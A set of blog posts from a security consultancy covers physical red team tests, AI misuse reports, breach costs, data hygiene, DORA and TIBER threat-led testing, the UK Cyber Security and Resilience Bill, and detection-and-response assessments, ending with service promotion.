Why bother with Physical Breach Tests?

A physical red team (breach) test is a real-world simulation of a physical breach. Think: tailgating into a secure office, picking locks, planting rogue devices, or accessing server rooms without authorisation. Unlike standard security audits, red teamers think and act like real adversaries – covertly probing for the weakest link in physical security protocols, policies, and human behaviour.

We get asked on occasion to test organisations for this sort of breach (far too few organisations actually want this tested). This is because they understand that whilst most of their threats may try to come in through digital means, a physical approach can be more impactful, and easier to deliver. Some of the reasons we’ve seen for wanting to deliver this of test include:

Helpful Staff

No matter how high-tech your access control systems are, they mean little if an attacker can simply follow an employee through the door (a practice known as tailgating). Physical red team tests highlight how susceptible staff can be to social engineering tactics like impersonation, fake deliveries, or authoritative-sounding pretexts.

Exposed infrastructure

Access to a single unsecured port in a server room or conference space can allow attackers to plug in malicious devices (like a Raspberry Pi or Bash Bunny), potentially leading to full network access. Red teamers often demonstrate just how quickly digital perimeters can be bypassed through a physical route.

Security Culture

Physical red team tests uncover issues beyond technical flaws: they reveal complacency, unclear protocols, and lack of awareness. When employees don’t challenge strangers, or when policies are not enforced in practice, that’s not just a failure of security—it’s a cultural problem.

Regulatory Pressure

As industries face stricter compliance requirements (e.g., NIST, ISO 27001, PCI-DSS), physical security is increasingly scrutinized. Some cyber insurance providers also now assess physical controls when pricing policies. Demonstrating that you’ve tested—and improved—your physical defences can reduce both regulatory risk and insurance premiums.

Actionable & Demonstratable

Unlike hypothetical risks or compliance checklists, red team results are concrete. They show exactly how an attacker got in, what assets were accessed, and where the defences broke down. These tests offer practical insights to improve training, upgrade systems, and harden physical defences.

Delivery of Testing

Before any physical red team test begins, legal authorisation is essential. Organisations should work with reputable providers who:

· Ensure written authorisation from executive leadership

· Clearly define the scope, targets, and rules of engagement

· Handle data collection, privacy, and evidence retention with care

· Respect employee dignity and avoid unnecessary disruption

This not only protects the business and the testers but ensures the activity remains ethical, controlled, and defensible.

At Prism Infosec, we not only have experience of conducting these sorts of engagements in a legal and risk managed way, but we also can provide advice, guidance and executive support in understanding and mitigating these sorts of threats.

If you would like to know more, please reach out and contact us:

Prism Infosec: Cyber Security Testing and Consulting Services

Abuses of AI

Much like Google and Anthropic, OpenAI have released their latest report on how threat actors are abusing AI for nefarious ends, such as using AI to scale deceptive recruitment efforts, or using AI to develop novel malware.

It is no surprise that as AI has become more pervasive, cheap to gain access to, and readily accessible, that threat actors are actively abusing it to further their own agendas. So having companies like Google, OpenAI and Anthropic openly discussing the abuses they are seeing is immensely helpful in terms of understanding the threat landscape and to understand the direction that threat actors are taking.

These reports should be C Suite level required reading. They contain nuggets of information that affect business from recruitment practices to securing their perimeter, and best of all they are free to access.

Adversarial Misuse of Generative AI | Google Cloud Blog

Disrupting malicious uses of AI: June 2025

Detecting and Countering Malicious Uses of Claude \ Anthropic

For us at Prism Infosec, we not only use these reports to help inform our clients, but we also feed them into our scenarios for tabletop exercises and red team scenarios, so we can help our clients prepare for and defend against being victims of threat actors abusing these technologies.

If you would like to know more, please reach out to us.

Prism Infosec: Cyber Security Testing and Consulting Services

Why Not Test in Dev?

We frequently get asked by clients if we can do our red team tests in their DEV or UAT environments instead of production. We are told its identical to production – same systems, dummy but similar data, same security controls, same user accounts, etc. Etc.

We get it, DEV and UAT environments are there to de-risk threats to production. However, no matter how close they resemble production, they are not what threat actors are going to target. No matter how similar it is, it won’t have the entire company working on it helping to hide threat actor activity. If alarms go off in it, are we absolutely certain that it will be treated with the same priority as the production system, even if multiple alarms are already going off in production?

Red team testing is only effective if it is the live, production environment because we need to ensure that the organisation can defend the network that is most critical to the day-to-day running of the business. If your DEV or UAT environments go down, how long can your business operate compared to if your production systems go down?

At Prism Infosec we do appreciate the concerns about allowing red team testing on production environments. We do not want to disrupt your business. That’s why we have an exceptionally robust risk management strategy. We collaborate and manage risks to ensure the business can protect itself against realistic threats without unforeseen disruptions.

Talk to us today to find out more. Prism Infosec: Cyber Security Testing and Consulting Services

The Cost of a Breach

IBM’s 2024 Cost of a Data Breach report, identified that the average cost of a data breach in the UK reached £3.58 million, and that this cost had increased 5% since 2023.

Verizon’s 2025 Data Breach Investigation report, suggested there was a 37% increase in ransomware attacks being reported, with a median payout of $115,000 paid by 36% of victims, of which 88% were smaller businesses. Keep in mind, this is just the cost of decrypting the ransomware, when you consider lost productivity, reputational risk, shareholder losses, service impacts, and potential fines, the cost skyrockets.

Even the European Union Agency for Cybersecurity (ENISA) has published a report discussing the impact of cyber security breaches, and highlights the impacts of such breaches across the financial sector; this reporting will only increase now that the Digital Operational Resilience Act (DORA) has come into force.

The news so far this year has identified a number of significant breaches: M&S, Co-Op, Harrods, Cartier, and North Face. More could be on the horizon, and the expectation is that this trend will only continue upwards.

Organisations do have tools to help them prepare for and potentially prevent these sorts of issues. Companies such as Prism Infosec offer red team engagements, where for a fraction of the cost of dealing with a breach, we can simulate how these threat actors operate, and help the organisation identify how they could be attacked, what they can do about it, and exercise how they would respond if or when this occurs, to minimise the impact, disruption, and damage these actors profit from. If your organisation is serious about managing the risk of being breached, then do reach out to us at Prism Infosec: Cyber Security Testing and Consulting Services so we can discuss how we can help secure your business.

ENISA Threat landscape: Finance sector

2025 Data Breach Investigations Report | Verizon

Cost of a data breach 2024 | IBM

AI and Red Teaming

Red teaming is still fairly young as far as cybersecurity disciplines go – most of us in this part of the industry have come in from being penetration testing consultants, or have some sort of background in IT security with a good mix of coding and scripting skills to develop tools. Our work often requires us to not only simulate the threat actors as closely as we can, but also manage the risks of our operations to avoid impacting our client’s business. This dichotomy of outcomes (simulating a threat actor who’s objective is to disrupt, whilst simultaneously trying not to disrupt) may seem confusing, but we also need to remember what red team is for. Its to help our clients test their detection and response capabilities. The objective of the red team is almost incidental – it merely sets a direction for the consultants to work towards whilst we determine what our clients can and cannot detect and what they do about it, if a detection occurs. That latter part is where the disruption is more likely to occur but even there, we can manage the risks.

So where does AI come into it? Well, we have all seen the news about AIs going to take over jobs in a number of fields, and red teaming is no different from the fears of this. The problem is, most AI systems these days are just really good guessers – I prefer to think of these things as almost expert systems, instead of a true intelligence. By that, I mean you can train them to be exceptional at specific tasks but if you go too broad with them, they really struggle. They don’t explain themselves; they can’t repeat steps identically particularly well; and they often forget or hallucinate critical elements when faced with large and complex tasks. A red team is a very large and complex series of tasks where forgetting or imagining critical steps will often lead to a poor outcome. Add into that mix, live environments and risk management, and the dangers of impacting a client become uncomfortably high. As a result, I have not yet met a single professional in this industry who would be happy to take the risk of letting a red team run entirely with AI, and I don’t see that changing any time soon.

However, I do see a future in which AIs help co-pilot red teams. By this I mean, that if the privacy concerns can be addressed, I can foresee a point where a private specialist red team LLM AI would be permitted to ingest data the red team acquires during an engagement (such as network mapping information, directory lists, active directory data, file contents, source code, etc.), and having it perform analysis on it. It can then provide suggestions on how the engagement can proceed. This would also have the added benefit of it being able to answer questions rapidly for the red team to help them consider additional attack paths, identify additional issues in the environment, and suggest additional things they could try. It could also quickly confirm if the red team had any interactions with systems within the client environment to deconflict if issues occur. In time I could even see this being an added real-time benefit for client control groups who would be able to interrogate the LLM for quicker results as to what the red team are doing and what has been identified to date.

AI is here now, and its evolving. We can’t really ignore it as it becomes a tool more and more used in everyday lives, and that means we need to find ways to make it work with the concerns we have. I personally feel that pushing them into smaller expert system roles is the right way forward, as this then allows them to fulfil the role of an assistant more fully. We also need to acknowledge that the public models have been trained unethically on source data taken without consent from authors and copyright holders. As their use grows, not only is there a considerable environmental impact, but I believe they will start to show strain in the near future. This is because, as the public further embraces these tools and uses them to generate new content, that AI generated content will also be absorbed by LLMs. This risks us entering a situation where the snake will eat its own tail and turn into the LLMs into an echo chamber, and we will see the quality of their output drop considerably. This will also likely be compounded by people losing critical thinking skills, which ultimately will harm us more than the AIs can help us.

Data Hygiene

Most organisation’s that are breached and compromised are done so not because they are lax with security, have poor patching, or are gambling that they will never be a victim; instead they usually suffer from poor data hygiene.

Users store data on desktops, in shared folders, in online repositories (such as Jira, SharePoint, Confluence, etc.), sometimes without appropriate controls, encryption, or consideration for who else may have access to it. As a result, threat actors who establish a foothold will often spend time sifting through these data repositories, harvesting credentials and testing if they are valid and what damage they can cause with them. This is a tactic we use in red teams to great success for completing objectives. The days of needing to throw zero days and exploits to compromise networks is not quite done, but why would any threat actor waste burning an exploit when an organisation’s data hygiene is poor and they can get all the credential material they need to threaten the organisation just by looking in accessible file stores?

Unfortunately hunting across corporate data stores for poorly secured passwords is not easy, in all my years of testing I’ve not seen a single solution that is 100% effective at this. Instead it often requires multiple sweeps, policies, user education, users being provided with appropriate tools and guidance, amnesty periods, and if all else fails, disciplinary measures to fix this sort of issue. Often it is not addressed until after a breach occurs, and even worse is that most firms don’t realise how bad the situation might be.

At Prism Infosec, we conduct red teams, where we do some analysis of your data hygiene and can help you address issues we find.

DORA TLPT Guidance Update

Today the EU provided the long awaited updated guidance in relation to DORA’s TLPT: DORA TLPT Guidance Update

This 30 page document further clarifies the necessity for Threat-Led Penetration Tests (TLPTs) under DORA.

We will be posting a more in-depth post about this in the very near future, but the key points that should be taken away are:

Who can Invoke a TLPT?

DORA’s TLPT requirements mirrors the TIBER-EU methodologies, process and structures – they will use the same structure for overseeing DORA TLPT’s as TIBER-EU engagements and will be overseen by either EU or national level authorities. The authorities are defined as those who are the single designated public authority for the financial sector; or an authority in the financial sector who has been authorised and delegated to manage TLPTs; or any competent authorities referred to in Article 46 of Regulation (EU) 2022/2554.

Who is in scope for a TLPT?

It will be down to the national or EU wide authorities to determine who will be in scope for a TLPT test; however the guidance is clear that it should be restricted to entities for which it is justified. This can include financial entities that operate in core financial services subsectors, as long as a TLPT cannot be justified for them.

Ultimately this means it will be down to the regulator’s discretion as to whether or not a TLPT should apply for any financial organisation and will be taken on a case-by-case basis. This will be based on the overall assessment of an organisation’s ICT (Information and Communications Technology) risk profile and maturity, the impact on the financial sector and of related financial stability concerns which must meet qualitative criteria. 

In Article 2 of the update the specific requirements for the identification of financial entities required to perform TLPTs are defined. Essentially the authorities will consider the following factors:

  • The size of the entity
  • The extent and nature of the financial entities connections with other entities in the financial sector of one or more EU member states.
  • The criticality or importance of the services the entity provides to the financial sector
  • The substitutability of services the entity provides
  • The complexity of the entity’s business model
  • The entity’s role in a wider enterprise with shared ICT systems

The authorities will also consider the following ICT risk-related factors:

  • The entity’s risk profile
  • The threat landscape for the entity
  • The degree of dependence their critical/important/supporting functions have from ICT systems
  • The complexity of the entity’s ICT architecture
  • The entity’s ICT services which are supported by third parties (including the quantity and contractual arrangements for third party and intra-group service providers)
  • The outcomes of any supervisory reviews relevant for assessment of the ICT maturity of the entity
  • The maturity of ICT business continuity plans and the ICT response and recovery plans
  • The maturity of ICT detection and mitigation controls
  • And whether the entity is part of group that is active in the financial sector of the EU that shares ICT systems.

The expectation is that that TLPT will be required for entities such as:

credit institutions, payment and electronic money institutions, central security depositories, central counterparties, trading venues, insurance and reinsurance undertakings. The definitions for these types of entities is included in the update and many will be related to their definition in other EU articles (all referenced), or in relation to total payment transactional amounts within a 2 year calendar period, or for entities which provide undertakings for gross written premiums (GWPs) or technical provisions above specified levels. It should be noted however that these same entities could be excused from a TLPT if the authority agrees it is inappropriate.

The authority is also required to consider points such as market share positions, and the range of activities the financial entity provides when making this assessment.

Furthermore, that criteria must also be applied and assessed in light of new markets as they enter the financial sector, such as crypto asset service providers authorised under  Article 59 of Regulation (EU) 2023/1114 of the European Parliament and of the Council.

Shared ICT Service Providers

The guidance also touches on financial entities that have the same ICT service provider. In those cases it will be down to the regulator as to whether a shared or entity level assessment is conducted, if a TLPT is deemed necessary.

If a TLPT is deemed as required by the authority, then the financial entity will be contacted and clearly presented with the authority’s expectation with regards to testing.

This regulation update will come into force 20 days after its publication (8th July 2025), so after this date is when entities could be contacted by letter from authorities notifying them of the requirement to conduct a TLPT test.

Additional Notes

Much of the rest of the regulation update covers the delivery of a TLPT in regards to roles, responsibilities, and expectations for TLPT providers (both Threat Intelligence and Red Team/Penetration testers). It also covers the basic expectations for financial entities being tested with regards to secrecy, procurement and scoping of the TLPT engagements. We will touch on those topics in more detail in a later blog post.

TIBER-BE Insights

The TIBER-EU framework is designed to help organisations improve their Cyber resiliency.

It has multiple stages: initiation (scoping, procurement, planning), threat intelligence, penetration testing (red teaming), purple teaming (attack replays, additional untested control tests, variances in attack methodologies working alongside the Blue team), and closure (reporting, remediation plans, attestation).

As a framework, TIBER can be used by any organisation, even though it was created for financial institutions. However, using the framework does not make your organisation compliant for the regulator or with DORA unless it is supported by an EU TIBER regulator team, and a TIBER test manager.

This information was presented and discussed at the NBB (National Bank of Belgium) TIBER-BE TLPT (Threat-Led Penetration Testing) launch event. The morning session was only for institutions who are, or will be undergoing a TIBER to inform of them of the framework. Prism Infosec were invited to the event as suppliers, and joined other suppliers and the institutions to mingle and attend relevant presentations.

The NBB TIBER-BE team discussed their implementation of TIBER and how it will align with DORA. At present additional guidance on the TLPT element of DORA is still pending (and has been since February), though is expected at some point in June, which should help clarify the TLPT phase, requirements and implementation in greater detail. Until that arrives, DORA compliant TLPT exercises cannot begin.

During the TLPT launch event there were a number of presentations. These included a keynote from the newly formed Belgian Cyber Force, a presentation on NIS2, the Belgian Cyber Fundamentals (CyFun) framework (looks like the UK’s Cyber Essentials) and was linked to the Belgian Centre for Cybersecurity who have a role similar to the UK’s NCSC and can support Belgian entities during cyber incidents. 

We also had a presentation on how one multinational Belgian organisation had implemented their own internal red team, what they learned along the way and importantly, how they measured and showed to the board how the organisation’s maturity and capability to defend itself improved over time.

The panel discussion contained a number of useful insights, from a variety of c-suite level individuals, some of which had been through TIBER and others who were waiting to go through TIBER. They shared insights into how to plan for and prepare for engagements, suggesting organisations prepare by doing a small red team before their TIBER to understand the process. They recommended choosing scenarios where you will get key learnings and do as much preparation for contingencies (leg ups, backup accounts, information) as you can.

These presentations, panels, and even the quiz were all backed by networking discussions over food and softdrinks. 

All in all, it was an insightful and useful event!

The Cyber Security and Resilience Bill – April 2025

In the King’s Speech it was announced that further details would follow about the CSR Bill, and it looks like we now have the confirmed and proposed measures:

Cyber Security and Resilience Bill: policy statement – GOV.UK

These have been proposed by both MPs and the Department for Science, Innovation and Technology (DSIT) and backed by the NCSC:

Cyber Security and Resilience Policy Statement to… – NCSC.GOV.UK

The bill looks to enhance the Network and Information Systems (NIS) 2018 Regulations:

The NIS Regulations 2018 – GOV.UK

Which was aimed at providing legal measures for improving the security (both physical and cyber) of IT systems for the provision of digital and essential services (online marketplaces, online search engines, cloud computing services) and essential services (transport, energy, water, health, and digital infrastructure services). Twelve regulators were identified as responsible for enforcing those regulations.

The major policy proposals and changes being introduced with the CSR not only increase the number of entities covered by NIS 2018, but also enhances the powers of these regulators, whilst aligning the UK, where appropriate with the approach taken in the EU’s NIS 2 directive:

Directive – 2022/2555 – EN – EUR-Lex

Understanding the Proposed UK Cyber Security Policy Changes

The UK government has laid out potential changes to its cyber security policy, aiming to bolster the nation’s resilience against evolving digital threats. These proposals encompass a range of measures designed to broaden the scope of regulation, strengthen supply chain security, and empower regulatory bodies. Here’s a breakdown of the key elements under consideration:

Expanding the Regulatory Framework

A significant aspect of the proposed changes involves bringing more entities under the umbrella of cyber security regulations.

  • Bringing More Entities into Scope: The policy seeks to extend its reach to organizations that play a crucial role in the digital ecosystem.
  • Managed Service Providers (MSPs) to be Regulated: Recognizing the critical access MSPs have to client IT systems and their potential vulnerability to cyber-attacks, they will now be subject to regulation.
    • Definition of MSPs: The policy defines MSPs as entities that:
      • Provide IT-related services to external organizations (not in-house).
      • Deliver services reliant on network and information systems.
      • Offer ongoing management, administration, or monitoring of IT infrastructure, networks, and cyber security activities.
      • Include network access or connection to a customer’s systems.
    • Regulatory Alignment: MSPs will be required to adhere to the same duties as digital service providers (RDSPs), with the Information Commissioner’s Office (ICO) acting as their regulator.

Strengthening Supply Chain Security

The proposals also place a strong emphasis on securing the digital supply chain.

  • New Duties for OES and RDSPs: Operators of essential services (OES) and RDSPs will face new obligations to actively manage cyber risks within their supply chains.
  • Designation of ‘Critical Suppliers’ (DCS): Regulators may designate certain suppliers as ‘Critical Suppliers’ (DCS), even if they are small firms, if a disruption to their services could significantly impact essential or digital services.
    • Criteria for DCS Designation (Proposed, Not Yet Agreed): A supplier could be classified as a DCS if:
      • It provides goods or services to OES or RDSPs.
      • Disruption to its services would have a significant effect on the delivery of essential or digital services.
      • Its operations depend on network and information systems.
      • It is not already subject to similar cyber security regulations.
    • Obligations for DCSs: Once designated, DCSs will be subject to the same security and reporting requirements as OES and RDSPs.

Empowering Regulators & Enhancing Oversight

The proposed policy aims to equip regulatory bodies with greater authority and tools to effectively oversee cyber security practices.

  • Technical and Methodological Security Requirements: It is proposed that security requirements will be aligned with the National Cyber Security Centre’s (NCSC) Cyber Assessment Framework (CAF). Additionally, the Secretary of State may issue sector-specific codes of practice to tailor standards.
  • Improving Incident Reporting: The scope of reportable incidents will be broadened to include those impacting data confidentiality, integrity, and availability. Furthermore, a two-stage reporting process is being introduced:
    • An initial notification within 24 hours.
    • A comprehensive report within 72 hours.
    • Reporting will be mandatory to both the relevant regulator and the NCSC.
    • Firms will also be obligated to alert affected customers following significant incidents.
  • Strengthening ICO’s Information Powers: The ICO will be granted enhanced powers to proactively gather information, enforce registration requirements, and new channels will be established for other bodies to share threat intelligence with the ICO.
  • Improving Cost Recovery for Regulators: The proposed bill seeks to allow regulators to set fees, publish their charging principles, and consult with the industry. This aims to address cash flow issues and alleviate cost burdens on taxpayers.

Keeping Pace with Emerging Threats

The policy acknowledges the dynamic nature of cyber threats and the need for adaptability.

  • Delegated Powers: The Secretary of State will be granted the authority to update regulations through secondary legislation, following consultation. This is intended to enable swift responses to evolving threats and technological advancements.

Additional Measures Under Consideration

Beyond the core elements, the proposed bill also includes additional measures that may be incorporated later, depending on legislative opportunities:

  • Regulating Data Centres: Data centres with a capacity of ≥1MW (or ≥10MW for enterprise-only use) could be recognized as Critical National Infrastructure (CNI) in 2024 and brought under regulation. This is estimated to affect approximately 182 data centres and 64 operators.
  • Statement of Strategic Priorities: The Secretary of State could publish a statement outlining strategic priorities for regulators every 3–5 years. This aims to ensure a consistent national cyber security strategy across different sectors and regulatory bodies.
  • Powers of Direction (National Security): The bill might be expanded to grant the Secretary of State the power to:
    • Direct entities to take specific actions against particular cyber threats.
    • Instruct regulators to tighten sector-specific guidance.
    • It is anticipated that these powers would only be invoked when necessary and proportionate to address national security concerns.

These proposed policy changes represent a significant step towards strengthening the UK’s cyber resilience in an increasingly complex digital landscape. Businesses and organizations across various sectors should pay close attention to the development and implementation of this legislation.

Roles & Responsibilities

As can be seen above, the bill will affect several entities, we have tried to summarise this into the following table:

Entity TypeDefinition / CharacteristicsRole & Obligations
Managed Service Providers (MSPs)– Provide services to other organisations (not in-house)
– Rely on network/information systems
– Involve ongoing IT system management or monitoring
– Have network access
– Newly regulated
– Same duties as RDSPs
– Must follow cyber security and incident reporting requirements
Relevant Digital Service Providers (RDSPs)– Digital services like online marketplaces, search engines, cloud providers– Already regulated under NIS 2018
– Subject to enhanced incident reporting and transparency duties
Small & Micro RDSPs– Smaller digital service providers currently exempt– May be regulated if designated as a Critical Supplier
Operators of Essential Services (OES)– Organisations providing essential national services– Existing regulation under NIS
– Will have new duties to manage supply chain risk
Designated Critical Suppliers (DCS)– Supplier to OES or RDSP
– Disruption could significantly affect service
– Relies on IT/network systems
– Not regulated elsewhere
– Will be brought under regulation
– Must meet security and incident reporting standards
Data Centres (Proposed)– Facilities hosting data infrastructure
– Thresholds: ≥1MW capacity (general), ≥10MW (enterprise)
– Expected to be included
– Duties include registration, risk management, and incident reporting
Regulators– ICO and sector-specific bodies– Enforce the regulations
Gain stronger powers for oversight, cost recovery, and cyber threat monitoring

Summing Up

Ultimately, the impact of the CSR will be wide-ranging. It will seek to provide stronger protection of critical services, enhance supply chain security, improve regulatory oversight and capabilities, improve incident response, provide regulator flexibility and some futureproofing, and improve national security and government readiness. The cost for businesses which have not previously fallen under these requirements, both in meeting these new obligations and in complying with them, will be high. However, when compared to the cost of a breach and disruption to these services, not just to the organisation but to the wider supply chain and country will be significantly higher.

Prism Infosec’s cybersecurity services, already work with several regulated industries and regulators, if you would like to discuss this with us, please feel free to reach out.

Capitalising on the Investment of a Red Team Engagement

Cybersecurity red teams are designed to evaluate an organisation’s ability to detect and respond to cybersecurity threats. They are modelled on real life breaches, giving an organisation an opportunity to determine if they have the resiliency to withstand a similar breach. No two breaches are entirely alike, as each organisation’s organic and planned growth of their infrastructure. They are often built around their initial purpose before being subjected to acquisitions and evolutions based on new requirements. As such the first stage of every red team, and real-world breach is understanding that environment enough to pick out the critical components which can springboard to the next element of the breach. Hopefully, somewhere along that route detections will occur, and the organisation’s security team can stress test their ability to respond and mitigate the threat. Regardless of outcome however, too often once the scenario is done, the red team hand in their report documenting what they were asked to do, how it went, and what recommendations would make the organisation more resilient, but is that enough?

Detection and Response assessments are part of the methodology for the Bank of England and FCA’s CBEST regulated intelligence-led penetration testing (red teaming). However, their interpretation of it is more aligned at understanding response times and capabilities. At LRQA (formerly LRQA Nettitude), I learned the value of a more attuned Detection and Response Assessment, a lesson I brought with me and evolved at Prism Infosec.

At its heart, the Detection and Responses Assessment takes the output of the red team, and then turns it on its head. It examines the engagement from the eyes of the defender. We identify the at least one instance of each of the critical steps of breach – the delivery, the exploitation, the discovery, the privilege escalation, the lateral movement, the action on objectives. For each of those, we look to identify if the defenders received any telemetry. If they did, we look to see if any of that telemetry triggered a rule in their security products. If it triggered a rule, we look to see what sort of alert it generated. If an alert was generated, we then look to see what happened with it – was a response recorded? If a response was recorded, what did the team do about it? Was it closed as a false positive, did it lead to the containment of the red team?

Five “so what” questions, at the end of which we have either identified a gap in the security system/process or identified good, strong controls and behaviours. There is more to it than that of course, but from a technical delivery point of view, this is what will drive benefits for the organisation. A red team should be able to highlight the good behaviours as well as the ones that still require work, and a good Detection and Response Assessment not only results in the organisation validating their controls but also understanding why defences didn’t work as well as they should. This allows the red team to present the report with an important foil – how the organisation responded to the engagement. It shows the other side of the coin, in a report that will be circulated with the engagement information at a senior level of engagement, and can set the entire engagement into a stark contrast.

The results can be seen, digested and understood by C-level suite executives. There is no point in having a red team and reporting to the board that because of poor credential hygiene, or outdated software that the organisation was breached and remains at risk. The board already knows that security is expensive and that they are risk, but if a red team can also demonstrate the benefits or direct the funding for security in a more efficient manner by helping the organisation understand the value of that investment then it becomes a much more powerful instrument of change. What’s even better is that it can become a measurable test – we can see how that investment improves things over time by comparing results between engagements and using that to tweak or adjust.

One final benefit is that security professionals on both sides of the divide, (defenders and attackers) gain substantial amounts of knowledge from such assessments – both sides lift the curtain, explain the techniques, the motivations and the limitations of the tooling and methodology. As a result both sides become much more effective, build greater respect, and are more willing to collaborate on future projects when not under direct test.

Next time your company is considering a red team, don’t just look at how long it will take to deliver or the cost, but also consider the return you are getting on that investment in the form of what will be delivered to your board. Please feel free to contact us at Prism Infosec if you would like to know more.

Our Red Team Services: https://prisminfosec.com/service/red-teaming-simulated-attack/